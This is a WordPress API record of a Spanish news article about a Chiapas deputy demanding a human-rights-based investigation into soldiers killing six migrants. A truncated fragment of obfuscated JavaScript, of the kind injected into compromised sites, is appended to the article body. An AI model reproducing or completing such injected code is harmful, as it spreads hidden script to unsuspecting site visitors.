{"id":18350,"date":"2024-10-14T02:44:08","date_gmt":"2024-10-14T02:44:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18350"},"modified":"2024-10-14T02:44:09","modified_gmt":"2024-10-14T02:44:09","slug":"diputada-panista-exige-investigar-asesinato-de-migrantes-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18350","title":{"rendered":"Diputada panista exige investigar asesinato de migrantes en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"540\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728873763567-540x1024.jpg\" alt=\"\" class=\"wp-image-18351\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728873763567-540x1024.jpg 540w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728873763567-158x300.jpg 158w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1728873763567.jpg 612w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>13 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Por los hechos ocurridos el 2 de octubre en el tramo carretero Huixtla \u2013 Villa Comaltitl\u00e1n, en el que seis personas migrantes, entre ellas una ni\u00f1a de s\u00f3lo 11 a\u00f1os, fueron asesinadas por las balas del ej\u00e9rcito mexicano, la diputada Jovannie Maricela Ibarra Gallardo, hizo un llamado a que se realicen las investigaciones con perspectiva de derechos humanos y con garant\u00edas de seguridad.<\/p>\n\n\n\n<p>Resalt\u00f3 que la situaci\u00f3n de las personas migrantes plantea retos para el gobierno federal, y entidades y municipios quienes se encuentran en la primera l\u00ednea de respuesta. La diputada aleg\u00f3 que desde su partido, se han pronunciado contra la militarizaci\u00f3n del pa\u00eds.<\/p>\n\n\n\n<p>\u201cDesde Acci\u00f3n Nacional, nos hemos pronunciado contra la militarizaci\u00f3n del pa\u00eds, no ha sido desde una simple postura de oposici\u00f3n pol\u00edtica\u2026 sino desde la verdadera preocupaci\u00f3n respecto a los riesgos que implica entregar al ej\u00e9rcito las tareas de seguridad p\u00fablica, con todas las diferencias en procedimientos y armamento que inevitablemente conllevan\u201d, dijo.<\/p>\n\n\n\n<p>Agreg\u00f3 que se ha documentado de aciones militares con diversos niveles de abusos. Bajo un contexto de pocos procesos de rendici\u00f3n de cuentas y pocas o nulas reformadas para garantizar la transparencia y construir mecanismos de control eficaces.<\/p>\n\n\n\n<p>Determin\u00f3 que en el caso de la Guardia Nacional, el gobierno se ha negado a cumplir una sentencia de la Corte Interamericana de Derechos Humanos, que mandata crear mecanismos y protocolos sobre el uso de la fuerza.<\/p>\n\n\n\n<p>Replic\u00f3 que \u201clos sucesos ocurridos no se pueden ver como un hecho aislado. Hoy, pese a la dimensi\u00f3n de la tragedia, hasta la fecha, fuera de este recinto, ninguna instituci\u00f3n, ni nivel de gobierno en Chiapas, donde ocurrieron los indignantes acontecimientos recientes, ha fijado una postura contundente sobre lo sucedido\u201d.<\/p>\n\n\n\n<p>Acot\u00f3 que desde el Congreso Estatal, \u201cno podemos nuevamente guardar silencio. Debemos condenar los hechos como lo que son: un exceso de la fuerza militar contra inocentes\u201d.<\/p>\n\n\n\n<p>La legisladora hizo un llamado a las autoridades para realizar las investigaciones con perspectiva de derechos humanos, priorizando siempre el testimonio directo de las v\u00edctimas, en condiciones dignas, imparciales y garantizando la seguridad.<\/p>\n\n\n\n<p>Adem\u00e1s aleg\u00f3 que no se debe solapar, silenciar ni simular los abusos en materia de justicia castrense,<\/p>\n\n\n\n<p>\u201cLo ocurrido el pasado 2 de octubre debe sacudirnos a todas y todos para generar conciencia, y replantear medidas encaminadas a que tragedias como las del pasado martes no se vuelvan a repetir\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 13 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Por los hechos ocurridos el 2 de octubre en el tramo carretero Huixtla \u2013 Villa Comaltitl\u00e1n, en el que seis personas migrantes, entre ellas una ni\u00f1a de s\u00f3lo 11 a\u00f1os, fueron asesinadas por las balas del ej\u00e9rcito mexicano, la diputada Jovannie Maricela Ibarra Gallardo, hizo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18351,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18350","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18350","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18350"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18350\/revisions"}],"predecessor-version":[{"id":18352,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18350\/revisions\/18352"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18351"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}